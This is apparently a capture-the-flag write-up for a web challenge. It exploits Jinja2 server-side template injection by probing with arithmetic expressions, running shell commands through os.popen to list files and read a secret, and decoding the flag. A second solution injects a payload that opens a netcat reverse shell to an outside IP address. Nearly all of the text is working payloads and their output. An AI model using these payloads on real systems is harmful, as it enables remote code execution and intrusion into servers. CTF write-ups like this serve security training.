http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/login
```
Oops! Page login doesn't exist :(
```

http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/{{7*7}}
```
Oops! Page 49 doesn't exist :(
```

{{7*'7'}}
```
7777777
```

=> Jinja2

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
```
app.py
lib
static
templates
```

{{config.__class__.__init__.__globals__['os'].popen('ls%20lib').read()}}
```
security.py
```

{{config.__class__.__init__.__globals__['os'].popen('cat%20lib/security.py').read()}}
```
QfsFjdz81cx8Fd1Bnbx8lczMXdfxGb0snZ0NGZ
```

Reverse => base64 decode
```
dctf{4ll_us3r_1nput_1s_3v1l}
```


===================== Solution 2 =====================

{{().__class__.__base__.__subclasses__()[186]()._module.__builtins__["__import__"]("os").system("nc 140.113.24.143 9001 -e /bin/sh")}}
